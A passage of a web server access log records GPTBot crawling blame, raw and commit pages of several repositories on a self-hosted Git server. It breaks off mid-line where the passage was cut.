"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:14:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 21659] [Gzip 10.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:14:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:14:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:14:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 21664] [Gzip 10.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:14:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9279] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:14:45:19 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" +[17/Feb/2026:14:45:19 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" +[17/Feb/2026:14:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9279] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:14:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 21631] [Gzip 10.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:14:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:14:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10589] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:14:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:14:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:14:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:14:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 10843] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:14:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile?display=source" [Client 74.7.227.38] [Length 11594] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" +[17/Feb/2026:14:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" +[17/Feb/2026:14:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 10343] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" +[17/Feb/2026:14:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" +[17/Feb/2026:14:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 74.7.227.38] [Length 9924] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" +[17/Feb/2026:14:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts?display=source" [Client 74.7.227.38] [Length 11472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" +[17/Feb/2026:14:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" +[17/Feb/2026:14:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10840] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" +[17/Feb/2026:14:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10840] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" +[17/Feb/2026:14:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" +[17/Feb/2026:14:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" +[17/Feb/2026:14:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" +[17/Feb/2026:14:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9933] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" +[17/Feb/2026:14:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10464] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" +[17/Feb/2026:14:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" +[17/Feb/2026:14:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" +[17/Feb/2026:14:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" +[17/Feb/2026:14:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 11304] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" +[17/Feb/2026:14:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:14:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:14:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" +[17/Feb/2026:14:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" +[17/Feb/2026:14:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10842] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" +[17/Feb/2026:14:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 120385] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:14:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 120367] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:14:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 213776] [Gzip 13.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:14:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 212883] [Gzip 13.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:14:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 226082] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:14:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 9848] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 11560] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 11129] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10956] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 11374] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 11256] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 11116] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:45:57 +0000] - 200 200 - GET https 